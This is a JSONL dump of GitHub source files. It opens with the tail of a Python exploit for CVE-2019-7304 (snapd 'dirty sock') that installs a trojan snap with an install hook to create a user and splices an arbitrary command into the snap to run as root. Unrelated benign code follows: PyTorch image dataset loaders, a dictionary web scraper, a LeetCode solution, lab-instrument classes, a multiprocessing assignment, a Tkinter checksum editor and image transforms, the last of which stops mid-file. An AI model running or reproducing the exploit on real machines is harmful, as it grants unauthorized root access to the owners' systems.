bind_sock(sockfile)\n\n # Delete trojan snap, in case there was a previous install attempt\n delete_snap(client_sock)\n\n # Install the trojan snap, which has an install hook that creates a user\n install_snap(client_sock)\n\n # Delete the trojan snap\n delete_snap(client_sock)\n\n # Remove the dirty socket file\n os.remove(sockfile)\n\n # Congratulate the lucky hacker\n print_success()\n\ndef exploit(command):\n \n global TROJAN_BASE_SNAP\n global TROJAN_SNAP\n command = command + ' #'\n index = 108 + len(command)\n TROJAN_BASE_SNAP_DECODE = TROJAN_BASE_SNAP.decode('base64')\n TROJAN_SNAP = \"\".join((TROJAN_BASE_SNAP_DECODE[:108], command, TROJAN_BASE_SNAP_DECODE[index:]))\n TROJAN_SNAP = base64.b64encode(TROJAN_SNAP)\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 2:\n print('Usage: ./exploit.py \"touch /root/POC\"')\n \n else:\n exploit(sys.argv[1])\n main()\n","repo_name":"Dhayalanb/Snapd-V2","sub_path":"CVE-2019-7304.py","file_name":"CVE-2019-7304.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"32262764845","text":"from skimage import io, transform, color\nfrom PIL import Image, ImageOps\nimport numpy as np\nimport torch\nfrom torch.utils import data\nfrom torchvision import transforms, utils\nimport os\nimport math\n\nclass OrganoidDataset(data.Dataset):\n 'dataset class for microwell organoid images'\n def __init__(self, path2files, experiments, image_names, Y, intensity_mean, intensity_var):\n assert len(image_names) == len(Y)\n assert len(experiments) == len(image_names)\n self.path = path2files\n self.experiments = experiments\n self.image_names = image_names\n self.Y = Y\n self.intensity_mean = intensity_mean\n self.intensity_var = intensity_var\n def __len__(self):\n return len(self.Y)\n def getXimage(self, index):\n img_name = self.image_names[index]\n experiment = self.experiments[index]\n img_loc = 'well_' + str(experiment) + '/' + img_name\n img_loc = os.path.join(self.path, img_loc)\n image = io.imread(img_loc)\n image = np.true_divide(color.rgb2gray(image) - self.intensity_mean, math.sqrt(self.intensity_var))\n image = np.reshape(image, newshape = (1, image.shape[0], image.shape[1])) \n return torch.from_numpy(image).float()\n# def getXimage(self, index):\n# img_name = 'well' + str(self.well_labels[index]) + '_day' + str(self.day_label_X[index]) + '_well.png'\n# img_loc = os.path.join(self.path, img_name)\n # skimage.io.imread returns a numpy array\n# image = io.imread(img_loc)\n # convert to grey scale\n# image = np.true_divide(color.rgb2gray(image) - self.mean, self.sd)\n # add color axis because torch image: CxHxW\n# image = np.reshape(image, newshape = (1, image.shape[0], image.shape[1]))\n# return torch.from_numpy(image).float()\n def getY(self, index):\n Y = self.Y[index]\n return torch.from_numpy(np.asarray(self.Y[index], dtype=float)).float()\n def __getitem__(self, index):\n X = self.getXimage(index)\n y = self.getY(index)\n return X, y\n\nclass OrganoidMwAreaDataset(data.Dataset):\n 'dataset class for microwell area organoid images'\n def __init__(self, path2files, well_labels, day_label_X,\n Y, intensity_mean = 0.5, intensity_var = 0.025,\n max_dim = 132):\n assert len(well_labels) == len(Y)\n assert len(day_label_X) == len(Y)\n self.path = path2files\n #self.mw_labels = microwell_labels\n self.well_labels = well_labels\n self.day_label_X = day_label_X\n self.Y = Y\n self.mean = intensity_mean\n self.sd = math.sqrt(intensity_var)\n self.max_dim = max_dim\n def __len__(self):\n return len(self.Y)\n def getAreaImage(self, index):\n img_name = 'well' + str(self.well_labels[index]) + '_day' + str(self.day_label_X[index]) + '_mw_area.png'\n img_loc = os.path.join(self.path, img_name)\n # skimage.io.imread returns a numpy array\n image = io.imread(img_loc)\n # convert to grey scale\n image = np.true_divide(color.rgb2gray(image) - self.mean, self.sd)\n larger_image = np.zeros((self.max_dim, self.max_dim))\n larger_image = np.pad(image, pad_width = ((0, self.max_dim - image.shape[0]), (0, self.max_dim - image.shape[1])), mode = 'constant', constant_values = 0.0)\n # resize and add color axis because torch image: CxHxW\n larger_image = np.reshape(larger_image, newshape = (1, self.max_dim, self.max_dim))\n # does it matter how the resizing is done? I don't think so\n return torch.from_numpy(larger_image).float()\n def getY(self, index):\n Y = self.Y[index]\n return torch.from_numpy(np.asarray(self.Y[index], dtype=float)).float()\n def __getitem__(self, index):\n X = self.getAreaImage(index)\n y = self.getY(index)\n return X, y\n\n\n\nclass OrganoidMultipleDataset(data.Dataset):\n 'dataset class for microwell organoid images'\n def __init__(self, path2files, image_names, Y, mean_sd_dict):\n for k, image_name in image_names.items():\n assert len(image_name) == len(Y)\n self.path = path2files\n self.image_names = image_names\n self.Y = Y\n self.mean_sd_dict = mean_sd_dict\n def __len__(self):\n return len(self.Y)\n def getXimage(self, index):\n all_images_list = []\n for day,img_names in self.image_names.items():\n #print(day, \" \", index)\n \n img_name = img_names[index]\n img_loc = os.path.join(self.path, img_name)\n image = io.imread(img_loc)\n mean, sd = self.mean_sd_dict[day]\n image = np.true_divide(color.rgb2gray(image) - mean, sd)\n all_images_list.append(image)\n images = np.array(all_images_list)\n return torch.from_numpy(images).float()\n def getY(self, index):\n Y = self.Y[index]\n return torch.from_numpy(np.asarray(self.Y[index], dtype=float)).float()\n def __getitem__(self, index):\n X = self.getXimage(index)\n y = self.getY(index)\n return X, y\n\n\n","repo_name":"timydaley/OrganoidNet","sub_path":"models/dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"20822259476","text":"\n# coding: utf-8\n\n# In[ ]:\n\nimport requests\nimport os\nimport re\nfrom pyquery import PyQuery as pq\n\ndef get_data(url):\n res = requests.get(url)\n #from pyquery import PyQuery as pq\n doc = pq(res.content)\n return doc\n\ndef content_write(content,filename):\n #将文字写入文件\n with open(filename,\"w\",encoding='utf-8') as f:\n for i in range (len(content)): \n f.write(content[i])\n f.write('\\n')\n f.close()\n \ndef pic_write(content,filename):\n #将图片src写入txt文件\n file = open(filename,'w+') \n file.write(content)\n file.close()\n \ndef mkdir(new_path):\n # new_path=path+title[j]\n if not os.path.exists(new_path): \n try:\n os.mkdir(new_path)\n except FileNotFoundError:\n pass\n\n\n# In[ ]:\n\nroot='http://www.guoxuedashi.com'\nkangxi='/kangxi'\ndoc=get_data(root+kangxi)\nurl=[pq(sq).attr('href') for sq in doc('.table2 td a')]\ntitle=[pq(st).text() for st in doc('.table2 td a')]\nfor h in range(len(url)):\n path = \"F:\\\\kangxi_dictionary\\\\\"\n new_path=path+title[h]\n mkdir(new_path)\n urll=root+url[h]\n doc=get_data(urll)\n url1=[pq(sq).attr('href') for sq in doc('.info_txt2.clearfix a')]\n title1=[pq(st).text() for st in doc('.info_txt2.clearfix a')]\n for j in range(len(url1)):\n new_path1=new_path+\"\\\\\"+title1[j]\n mkdir(new_path1)\n url2=root+url1[j]\n docc=get_data(url2)\n text_name=title1[j]\n try:\n pic_src=docc('.info_txt2.clearfix img').attr('src')\n a=docc('.info_txt2.clearfix p').text()\n if(a==None):\n continue\n else:\n b=a.split('\\n')\n filename_pic=new_path1+\"\\\\\"+text_name+'_picsource.txt'\n filename_text=new_path1+\"\\\\\"+text_name+'_text.txt'\n pic_write(pic_src,filename_pic)\n content_write(b,filename_text)\n \n except AttributeError:\n pass\n continue\n \n\n","repo_name":"wangxiya123/WangXiya_Advanced-Python_Homework","sub_path":"小组项目/康熙字典爬虫.py","file_name":"康熙字典爬虫.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"40581727186","text":"\"\"\"\n\n1576. Replace All ?'s to Avoid Consecutive Repeating Characters\n\nGiven a string s containing only lower case English letters and the '?' character, convert all the '?' characters into lower case letters such that the final string does not contain any consecutive repeating characters. You cannot modify the non '?' characters.\n\nIt is guaranteed that there are no consecutive repeating characters in the given string except for '?'.\n\nReturn the final string after all the conversions (possibly zero) have been made. If there is more than one solution, return any of them. It can be shown that an answer is always possible with the given constraints.\n\n \n\nExample 1:\n\nInput: s = \"?zs\"\nOutput: \"azs\"\nExplanation: There are 25 solutions for this problem. From \"azs\" to \"yzs\", all are valid. Only \"z\" is an invalid modification as the string will consist of consecutive repeating characters in \"zzs\".\nExample 2:\n\nInput: s = \"ubv?w\"\nOutput: \"ubvaw\"\nExplanation: There are 24 solutions for this problem. Only \"v\" and \"w\" are invalid modifications as the strings will consist of consecutive repeating characters in \"ubvvw\" and \"ubvww\".\nExample 3:\n\nInput: s = \"j?qg??b\"\nOutput: \"jaqgacb\"\nExample 4:\n\nInput: s = \"??yw?ipkj?\"\nOutput: \"acywaipkja\"\n \n\nConstraints:\n\n1 <= s.length <= 100\n\ns contains only lower case English letters and '?'.\n\n\"\"\"\n\nclass Solution(object):\n def modifyString(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n def generate(num, start, end):\n for i in range(ord('a'), ord('z')+1):\n if (str(chr(i)) != start and str(chr(i)) != end):\n if (num == 1):\n return chr(i), True\n subStr, retVal = generate(num-1, chr(i), end)\n if (retVal == True):\n return chr(i) + subStr , True\n return \"\" ,False\n count = 0\n before, after = \"\", \"\"\n Ans = \"\"\n for ch in s:\n if (ch != \"?\"):\n if (count > 0):\n after = ch\n gen, _ = generate(count, before, after)\n Ans += before + gen \n after = \"\"\n before = \"\"\n count = 0\n if (before != \"\"):\n Ans += before\n before = ch\n elif (ch == \"?\"):\n count += 1\n if (before != \"\"):\n Ans += before\n if (count > 0):\n gen,_ = generate(count, before, \"\")\n Ans += gen\n \n return Ans\n \n \n ","repo_name":"venkatsvpr/Problems_Solved","sub_path":"LC_Replace_All_?_To_Avoid_Consecutive_Repeating_Characters.py","file_name":"LC_Replace_All_?_To_Avoid_Consecutive_Repeating_Characters.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"42406749558","text":"# this is lukyi testing git.\nimport qcodes as qc\nimport numpy as np\nimport time\nclass setparam_meta(qc.Parameter):\n def __init__(self, name, label, scale_param, instrument, maxVal, unit, inter_delay, step):\n super().__init__(name = name, unit=unit)\n self.label = label\n self._scale_param = float(scale_param)\n self._instrument_channel = instrument\n self._maxVal = float(maxVal)\n self.step = step\n self.inter_delay=inter_delay\n self.metadata = instrument.full_name\n #self.add_parameter('voltage', get_cmd=self.getx, set_cmd=self.setx)\n\n def get_raw(self):\n raw_getval = self._instrument_channel.get()\n if type(raw_getval) == tuple: # Dirty fix for instrument parameters that return tuples\n raw_getval = raw_getval[0]\n getval = raw_getval * self._scale_param\n return getval\n \n def set_raw(self, setval):\n if abs(setval) > self._maxVal:\n raise Exception(\"Error: Set value is limited to {:e}\".format(self._maxVal))\n else:\n raw_setval = setval / self._scale_param\n self._instrument_channel.set(raw_setval)\n\nclass getparam_meta(qc.Parameter):\n def __init__(self, name, label, scale_param, instrument, unit):\n super().__init__(name = name, unit=unit)\n self.label = label\n self._scale_param = float(scale_param)\n self._instrument_channel = instrument\n self.metadata = instrument.full_name\n\n def get_raw(self):\n raw_getval = self._instrument_channel.get()\n if type(raw_getval) == tuple: # Dirty fix for instrument parameters that return tuples\n raw_getval = raw_getval[0]\n getval = raw_getval * self._scale_param\n return getval\n\n# Define a class for reading out the lockin (read X,Y and convert to R and G) for voltage bias measurement\n# dI/dV\n# Returns the resistance (R), conductance (G), X, Y lockin values, AC current \nclass diff_R_G_Vbias(qc.MultiParameter):\n def __init__(self, \n lockin_handle, \n V_div, \n IV_gain, \n V_ac=None, \n trans_gain=1,\n suffix='', \n autosense=False, \n ntc=3, \n lim=1e-6):\n super().__init__(name='diff_resistance'+suffix,\n names=('R'+suffix, 'G'+suffix, 'X'+suffix, 'Y'+suffix, 'I_ac'+suffix),\n shapes=((), (), (), (), ()),\n labels=('Differential resistance'+suffix, 'Differential conductance'+suffix, 'Raw voltage X'+suffix, 'Raw voltage Y'+suffix, 'I_ac'+suffix),\n units=(r'$\\Omega$', r'e$^2$/h', 'V', 'V', 'A'),\n setpoints=((), (), (), (), ()),\n docstring='Differential resistance and conductance from current -IVconv> voltage measurement')\n self._IV_gain = IV_gain\n self._V_div = V_div\n self._lockin_handle = lockin_handle\n self._autosense = autosense\n self._V_ac = V_ac\n if self._V_ac is not None:\n self._lockin_handle.amplitude.set(self._V_ac)\n self._ntc = ntc\n self._lim = lim\n self._trans_gain = trans_gain\n \n def get_raw(self):\n if self._autosense:\n auto_sensitivity(self._lockin_handle, self._ntc, self._lim)\n voltageX,voltageY=np.float64(self._lockin_handle.snap('x','y'))\n self._V_ac = np.float64(self._lockin_handle.amplitude.get())\n # some constants\n const_e = 1.60217662e-19\n const_h = 6.62607004e-34\n I_ac = voltageX/self._IV_gain\n diff_resistance = (self._V_ac*self._trans_gain/self._V_div )/ I_ac\n diff_conductance = 1/diff_resistance / const_e**2 * const_h \n return (diff_resistance, diff_conductance, voltageX, voltageY, I_ac)\n\n# Define a class for reading out the lockin (X,Y at the same time and convert to R and G)\n# dV/dI\n# Returns the resistance (R), conductance (G), X and Y lockin values\nclass diff_R_G_Ibias(qc.MultiParameter):\n def __init__(self, \n lockin_handle, \n R_pre, \n V_gain, \n V_ac=None, \n trans_gain=1,\n suffix='', \n autosense=False, \n ntc=3, \n lim=1e-6):\n super().__init__(name='diff_resistance'+suffix,\n names=('R'+suffix, 'G'+suffix, 'X'+suffix, 'Y'+suffix),\n shapes=((), (), (), ()),\n labels=('Differential resistance'+suffix, 'Differential conductance'+suffix,'Raw voltage X'+suffix, 'Raw voltage Y'+suffix),\n units=(r'$\\Omega$', r'e$^2$/h', 'V', 'V'),\n setpoints=((), (), (), ()),\n docstring='Differential resistance and conductance converted from raw voltage measurement')\n self._R_pre = R_pre\n self._V_gain = V_gain\n self._lockin_handle = lockin_handle\n self._autosense = autosense\n self._V_ac = V_ac\n if self._V_ac is not None:\n self._lockin_handle.amplitude.set(self._V_ac)\n self._ntc = ntc\n self._lim = lim\n self._trans_gain = trans_gain\n \n def get_raw(self):\n if self._autosense:\n auto_sensitivity(self._lockin_handle, self._ntc, self._lim)\n voltageX,voltageY=np.float64(self._lockin_handle.snap('x','y'))\n self._V_ac = np.float64(self._lockin_handle.amplitude.get())\n # some constants\n const_e = 1.60217662e-19\n const_h = 6.62607004e-34 \n diff_resistance = (voltageX/self._V_gain)/(self._V_ac*self._trans_gain/(self._R_pre))\n diff_conductance = 1/diff_resistance / const_e**2 * const_h\n return (diff_resistance, diff_conductance, voltageX, voltageY)\n\ndef auto_sensitivity(self, ntc, lim):\n sens = self.sensitivity.get()\n X_val = self.X.get()\n tc = self.time_constant()\n while np.abs(X_val) <= 0.2*sens or np.abs(X_val) >= 0.9*sens:\n if np.abs(X_val) <= 0.2*sens:\n if sens == lim:\n break\n self._change_sensitivity(-1)\n time.sleep(ntc*tc) #Wait to read the correct value\n else:\n self._change_sensitivity(1)\n time.sleep(ntc*tc)\n sens = self.sensitivity.get()\n X_val = self.X.get() \n# Multigate parameter class\n\nclass multi_instrument_set(qc.Parameter):\n def __init__(self, \n name, \n label, \n scale_param, \n instrument, \n slope, \n offset, \n maxVal, \n unit, \n inter_delay, \n step,\n step_meta = 1e-3, \n inter_delay_meta = 1e-5):\n super().__init__(name = name, unit=unit)\n self.label = label\n self._scale_param = np.array(scale_param, dtype=float)\n self._instrument_channel = np.array(instrument)\n self._step_meta = step_meta ###actual step size of meta, set to \"None\" if you want the instrument to sweep seperately\n self.step=None ###step size for first use or after exceeding maxVal\n self.inter_delay=inter_delay_meta\n self._slope = np.array(slope, dtype=float)\n self._offset = np.array(offset, dtype=float)\n self._maxVal = np.array(maxVal, dtype=float)\n self._length = len(self._instrument_channel)\n self._once = False\n for k in range(self._length): ###step size and inter delay for each instrument\n instrument[k].step = step[k]\n instrument[k].inter_delay = inter_delay[k]\n\n def get_raw(self):\n return 0\n \n def set_raw(self, setval):\n ### Initialisation for first run after definition, so that gates are swept seperately\n if (self._once == False):\n self._once = True\n self.step =self._step_meta\n \n ### Calculate the values to set for all instruments\n raw_setval = np.divide((self._slope*setval+self._offset),self._scale_param)\n\n ### Check maxVal and then set\n can_set = True\n for k in range(self._length):\n if abs(raw_setval[k]) > self._maxVal[k]:\n can_set = False\n break\n if can_set == False:\n raise Exception(\"Error: One of the set values is limited\")\n self._once = False\n else: \n for k in range(self._length):\n self._instrument_channel[k].set(raw_setval[k])\n\nclass multi_instrument_get(qc.MultiParameter):\n def __init__(self, name, names, labels, scale_param, instrument, units):\n super().__init__(name=name, names = names, units = units, labels = labels, shapes = ( (),)*len(instrument), setpoints =( (),)*len(instrument) ) \n #self.names = names\n #self.label = label\n self._scale_param = np.array(scale_param, dtype=float)\n self._instrument_channel = instrument\n self._length = len(self._instrument_channel)\n \n def get_raw(self):\n get_val = np.zeros(self._length)\n for k in range(self._length):\n get_val[k] = self._instrument_channel[k].get() * self._scale_param[k]\n return get_val","repo_name":"KnightForest/QCTools","sub_path":"qctools/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"13781278725","text":"'''\nRequirements\n1. Finish the team06 assignment (if necessary).\n2. Change your program to process all 300 images using 1 CPU, then 2 CPUs, all the way up to the\n number of CPUs on your computer plus 4.\n3. Keep track of the time it takes to process all 300 images per CPU.\n4. Plot the time to process vs the number of CPUs.\n \nQuestions:\n1. What is the relationship between the time to process versus the number of CPUs?\n Does there appear to be an asymptote? If so, what do you think the asymptote is?\n > The graph is an exponential decay function so as the number of CPUs increases the time to process drastically decreases.\n > There appears to be a horizontal asymptote to me which is about y = 12 seconds.\n2. Is this a CPU bound or IO bound problem? Why?\n > This is a CPU bound problem, there is no input or output to deal with.\n > The computer is strictly processing images and only relies on the CPU.\n3. Would threads work on this assignment? Why or why not? (guess if you need to) \n > I don't think threads would really help on this assignment because this is a CPU bound problem,\n > and threads only improve performance in I/O bound problems.\n4. When you run \"create_final_video.py\", does it produce a video with the elephants\n inside of the screen?\n > Yes.\n'''\n\nfrom matplotlib.pylab import plt # load plot library\nfrom PIL import Image\nimport numpy as np\nimport timeit\nimport multiprocessing as mp\n\n# 4 more than the number of cpu's on your computer\nCPU_COUNT = mp.cpu_count() + 4\n\n# TODO Your final video need to have 300 processed frames. However, while you are\n# testing your code, set this much lower\nFRAME_COUNT = 300\n\nRED = 0\nGREEN = 1\nBLUE = 2\n\n\ndef create_new_frame(image_file, green_file, process_file):\n \"\"\" Creates a new image file from image_file and green_file \"\"\"\n\n # this print() statement is there to help see which frame is being processed\n print(f'{process_file[-7:-4]}', end=',', flush=True)\n\n image_img = Image.open(image_file)\n green_img = Image.open(green_file)\n\n # Make Numpy array\n np_img = np.array(green_img)\n\n # Mask pixels\n mask = (np_img[:, :, BLUE] < 120) & (\n np_img[:, :, GREEN] > 120) & (np_img[:, :, RED] < 120)\n\n # Create mask image\n mask_img = Image.fromarray((mask*255).astype(np.uint8))\n\n image_new = Image.composite(image_img, green_img, mask_img)\n image_new.save(process_file)\n\n\n# This process_frames function is the function that is called by the map function and will get the images and pass them to the\n# create_new_frame function so the combined image can be created.\ndef process_frames(image_number):\n image_file = rf'elephant/image{image_number:03d}.png'\n green_file = rf'green/image{image_number:03d}.png'\n process_file = rf'processed/image{image_number:03d}.png'\n\n create_new_frame(image_file, green_file, process_file)\n\n\nif __name__ == '__main__':\n all_process_time = timeit.default_timer()\n\n # Use two lists: one to track the number of CPUs and the other to track\n # the time it takes to process the images given this number of CPUs.\n xaxis_cpus = []\n yaxis_times = []\n\n # List of integers for the number of each frame we need to process.\n inputs = list(range(1, FRAME_COUNT + 1))\n\n # For loop that will start 1 cpu, then 2 cpus, and go all the way to CPU_COUNT (which is the number of cpus on the machine plus 4).\n for count in range(1, CPU_COUNT + 1):\n # Starts a timer for this iteration.\n start_time = timeit.default_timer()\n\n # Starts the processing pool and calls the map function to process each frame.\n with mp.Pool(count) as p:\n p.map(process_frames, inputs)\n\n # Prints the number of CPU cores used and the time taken to process all images.\n print(f'\\n\\nProcessed with {count} CPU cores.')\n time_taken = timeit.default_timer() - start_time\n print(\n f'Time To Process all images = {time_taken} seconds')\n\n # Appending the data to the lists for the graph.\n xaxis_cpus.append(count)\n yaxis_times.append(time_taken)\n\n print(\n f'Total Time for ALL processing: {timeit.default_timer() - all_process_time} seconds')\n\n # create plot of results and also save it to a PNG file\n plt.plot(xaxis_cpus, yaxis_times, label=f'{FRAME_COUNT}')\n\n plt.title('CPU Core yaxis_times VS CPUs')\n plt.xlabel('CPU Cores')\n plt.ylabel('Seconds')\n plt.legend(loc='best')\n\n plt.tight_layout()\n plt.savefig(f'Plot for {FRAME_COUNT} frames.png')\n plt.show()\n","repo_name":"markvagil/cse251w23","sub_path":"week06/assignment/assignment06.py","file_name":"assignment06.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40809502876","text":"import os\nimport refinery\nimport tkinter as tk\n\nfrom traceback import format_exc\n\nfrom binilla.widgets.binilla_widget import BinillaWidget\n\nfrom refinery import editor_constants as e_c\nfrom refinery import crc_functions\n\n\nclass RefineryChecksumEditorWindow(tk.Toplevel, BinillaWidget):\n active_map = None\n validating = False\n\n def __init__(self, *args, **kwargs):\n self.active_map = kwargs.pop('active_map', None)\n BinillaWidget.__init__(self, *args, **kwargs)\n tk.Toplevel.__init__(self, *args, **kwargs)\n\n try:\n self.iconbitmap(e_c.REFINERY_ICON_PATH)\n except Exception:\n if not e_c.IS_LNX:\n print(\"Could not load window icon.\")\n\n self.geometry(\"300x80\")\n self.title(\"Change map checksum\")\n self.resizable(0, 0)\n\n self.cs = tk.StringVar(self, 'Checksum functions unavailable')\n self.cs.trace(\"w\", self.validate)\n\n # frames\n self.checksum_frame = tk.LabelFrame(self, text=\"Current random checksum\")\n self.button_frame = tk.Frame(self)\n\n # rename\n self.checksum_entry = tk.Entry(\n self.checksum_frame, textvariable=self.cs, justify='center')\n\n self.apply_button = tk.Button(\n self.button_frame, text=\"Apply to current map\",\n command=self.apply, width=20)\n\n # pack everything\n self.checksum_frame.pack(padx=4, expand=True, fill=\"x\", pady=2)\n self.button_frame.pack(expand=True, fill=\"x\")\n\n self.checksum_entry.pack(padx=4, pady=3, side='left',\n fill='x', expand=True)\n self.apply_button.pack(side='left', expand=True, padx=4)\n\n # make the window not show up on the start bar\n self.transient(self.master)\n\n if self.active_map:\n s = \"\"\n for c in \"%08x\" % self.active_map.map_header.crc32:\n s += c\n if len(s) % 3 == 2:\n s += \" \"\n self.cs.set(s[: 11])\n self.apply_style()\n\n def destroy(self):\n try: self.master.checksum_window = None\n except AttributeError: pass\n tk.Toplevel.destroy(self)\n\n def validate(self, *a):\n if self.active_map is None or self.validating:\n return\n\n self.validating = True\n try:\n s, ts = self.cs.get(), \"\"\n test = set(\"0123456789abcdefABCDEF\")\n spaces = 0\n for c in s:\n if c in test:\n ts += c\n if len(ts) % 3 == 2:\n ts += \" \"\n spaces += 1\n\n ts = ts[: 11]\n index = self.checksum_entry.index(tk.INSERT)\n self.checksum_entry.icursor(index + spaces)\n\n if len(ts.replace(\" \", \"\")) == 8:\n c = int(ts.replace(\" \", \"\"), 16)\n self.checksum_entry.config(bg=\"white\")\n else:\n self.checksum_entry.config(bg=\"red\")\n\n self.cs.set(ts)\n except Exception:\n print(format_exc())\n\n self.validating = False\n\n def apply(self, e=None):\n c = self.cs.get().replace(' ', '')\n if self.active_map is None or not c:\n return\n\n try:\n self.active_map.map_header.crc32 = int(c, 16)\n except Exception:\n return\n self.active_map.force_checksum = True\n self.destroy()\n","repo_name":"Sigmmma/refinery","sub_path":"refinery/windows/crc_window.py","file_name":"crc_window.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"} +{"seq_id":"6586854735","text":"from Notes import *\r\nfrom lxml import etree\r\nclass KeyboardBindings:\r\n\r\n def __init__(self, file):\r\n tree = etree.parse(file)\r\n letters = list()\r\n frequences = list()\r\n for letter in tree.xpath(\"/keyboardBindings/gamme/binding/letter\"):\r\n letters.append(letter.text)\r\n for note in tree.xpath(\"/keyboardBindings/gamme/binding/note\"):\r\n frequences.append(self.calculateFrequency(note.text))\r\n self.bindings = dict(zip(letters, frequences))\r\n\r\n def calculateFrequency(self, note):\r\n try:\r\n if note[0:-1] in Notes.NOTES.keys():\r\n return Notes.NOTES.get(note[0:-1])*2**int(note[-1:])\r\n else:\r\n raise Exception(\"Error with note format.\")\r\n except ValueError:\r\n print(\"Parse error from bindings file.\")\r\n\r\n def getFrequency(self, char):\r\n for letter in self.bindings.keys():\r\n if char in letter:\r\n return self.bindings.get(letter)\r\n return -1","repo_name":"MaxPoweur/AudioSynthesizer","sub_path":"KeyboardBindings.py","file_name":"KeyboardBindings.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"11667304488","text":"'''Image data transforms that can be applied after reading of raw data, before the application of the model\n\nWritten By: Anders Ohrn, October 2020\n\n'''\nfrom enum import Enum\nfrom torchvision import transforms\n\nclass GridMakerError(Exception):\n pass\n\nclass ZScoreConsts(Enum):\n '''Mean value to use for standard Z-score normalization, taken from https://pytorch.org/docs/stable/torchvision/models.html'''\n Z_MEAN = [0.485, 0.456, 0.406]\n '''Standard deviation values to use for standard Z-score normalization, taken from https://pytorch.org/docs/stable/torchvision/models.html'''\n Z_STD = [0.229, 0.224, 0.225]\n\n\nclass StandardTransform(object):\n '''Standard Image Transforms for pre-processing source image\n\n Args:\n min_dim (int): Length of shortest dimension of transformed image\n to_tensor (bool): If True, the output will be a PyTorch tensor, else PIL Image\n square (bool): If True, the source image (after resizing of shortest dimension) is cropped at the centre\n such that output image is square\n normalize (bool): If True, Z-score normalization is applied\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n '''\n def __init__(self, min_dim=300, to_tensor=True, square=False,\n normalize=True, norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n\n ts = [transforms.ToPILImage(), transforms.Resize(min_dim)]\n if square:\n ts.append(transforms.CenterCrop(min_dim))\n if to_tensor:\n ts.append(transforms.ToTensor())\n if normalize:\n ts.append(transforms.Normalize(norm_mean, norm_std))\n\n self.transform_total = transforms.Compose(ts)\n\n def __call__(self, img):\n return self.transform_total(img)\n\n\nclass UnNormalizeTransform(object):\n '''Invert standard image normalization. Typically used in order to create image representation to be saved for\n visualization\n\n Args:\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n '''\n def __init__(self, norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n self.transform_total = transforms.Normalize(mean=[-m / s for m, s in zip(norm_mean, norm_std)],\n std=[1.0 / s for s in norm_std])\n\n def __call__(self, img):\n return self.transform_total(img)\n\n\nclass DataAugmentTransform(object):\n '''Random Image Transforms for the purpose of data augmentation\n\n This class is not fully general, and assumes the input images have width 50% greater than height, which\n is true for fungi image dataset. Reuse this class with caution.\n\n Args:\n augmentation_label (str): Short-hand label for the type of augmentation transform to perform\n min_dim (int): Length of shortest dimension of transformed image\n to_tensor (bool): If True, the output will be a PyTorch tensor, else PIL Image\n normalize (bool): If True, Z-score normalization is applied\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n '''\n def __init__(self, augmentation_label, min_dim=300, to_tensor=True, square=False,\n normalize=True, norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n\n ts = [transforms.ToPILImage(), transforms.Resize(min_dim)]\n if square:\n ts.append(transforms.CenterCrop(min_dim))\n\n if augmentation_label == 'random_resized_crop':\n ts.append(transforms.RandomResizedCrop((min_dim, int(min_dim * 1.5)), scale=(0.67,1.0)))\n elif augmentation_label == 'random_rotation':\n ts.append(transforms.RandomRotation(180.0))\n elif augmentation_label == 'random_resized_crop_rotation':\n ts.append(transforms.RandomResizedCrop((min_dim, int(min_dim * 1.5)), scale=(0.67, 1.0)))\n ts.append(transforms.RandomRotation(180.0))\n else:\n raise ValueError('Unknown augmentation label: {}'.format(augmentation_label))\n\n if to_tensor:\n ts.append(transforms.ToTensor())\n if normalize:\n ts.append(transforms.Normalize(norm_mean, norm_std))\n self.transform_total = transforms.Compose(ts)\n\n def __call__(self, img):\n return self.transform_total(img)\n\n\nclass OverlapGridTransform(object):\n '''Transformer of image to multiple image slices on a grid. The images slices can be overlapping.\n\n In order for the slicing of the image to add up the following equality must hold:\n `crop_dim + (img_n_splits - 1) * crop_step_size == img_input_dim`\n\n Args:\n img_input_dim (int): Length and height of square of source image to be sliced by grid. Defaults to 224.\n img_n_splits (int): Number of slices per side, thus total number of slices for one source image\n will be `img_n_splits * img_n_splits`. Defaults to 6.\n crop_step_size (int): Number of pixels between grid lines. Defaults to 32.\n crop_dim (int): Length and height of grid squares. Defaults to 64.\n norm_mean : mean value for normalization of the R,G,B channels\n norm_std : std value for normalization of the R,G,B channels\n\n Raises:\n GridMakerError: In case the grid cropping specifications are not adding up\n\n '''\n def __init__(self, img_input_dim=224, img_n_splits=6, crop_step_size=32, crop_dim=64,\n norm_mean=ZScoreConsts.Z_MEAN.value, norm_std=ZScoreConsts.Z_STD.value):\n\n if not crop_dim + (img_n_splits - 1) * crop_step_size == img_input_dim:\n raise GridMakerError('Image grid crop not possible: crop_dim + (img_n_splits - 1) * crop_step_size != img_input_dim')\n\n # Transformations of the source image: To PIL Image -> Resize shortest dimension -> 